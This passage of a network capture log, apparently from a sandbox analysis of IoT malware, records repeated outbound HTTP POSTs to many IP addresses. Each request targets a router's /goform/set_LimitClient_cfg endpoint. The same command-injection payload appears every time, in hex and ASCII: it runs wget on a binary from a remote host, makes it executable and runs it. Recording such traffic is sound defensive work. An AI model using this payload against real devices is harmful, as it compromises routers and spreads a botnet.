                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1658192.168.2.236001485.127.216.08080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.416634083 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1659192.168.2.2347178221.74.83.1718080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.416650057 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1660192.168.2.2360164147.169.47.1748080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.416654110 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1661192.168.2.2343776151.79.62.688080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.416712999 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1662192.168.2.233557423.28.83.2138080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.416738033 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1663192.168.2.2341940188.32.141.58080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.416738033 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1664192.168.2.2338254193.202.172.1728080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.416799068 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1665192.168.2.2349544129.93.175.1758080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.416806936 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1666192.168.2.234884269.73.81.1208080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.416835070 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1667192.168.2.2346176162.101.125.1848080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.416843891 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1668192.168.2.2335748159.153.154.938080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.416861057 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1669192.168.2.2334206180.61.139.198080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.416867018 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1670192.168.2.2345868116.150.105.1618080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.417359114 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1671192.168.2.234330827.82.206.968080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.417382002 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1672192.168.2.2342616110.68.5.2278080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.417403936 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1673192.168.2.2352002153.116.179.688080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.417449951 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1674192.168.2.2348636119.98.109.938080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.417469025 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1675192.168.2.2340764103.170.177.2208080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.417491913 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1676192.168.2.2356552131.51.180.2128080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.417514086 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1677192.168.2.234048042.253.83.1318080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.417526007 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1678192.168.2.233597817.31.196.2278080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.417592049 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1679192.168.2.2344782133.205.208.1628080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.417614937 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1680192.168.2.2342064110.2.143.628080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.417617083 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
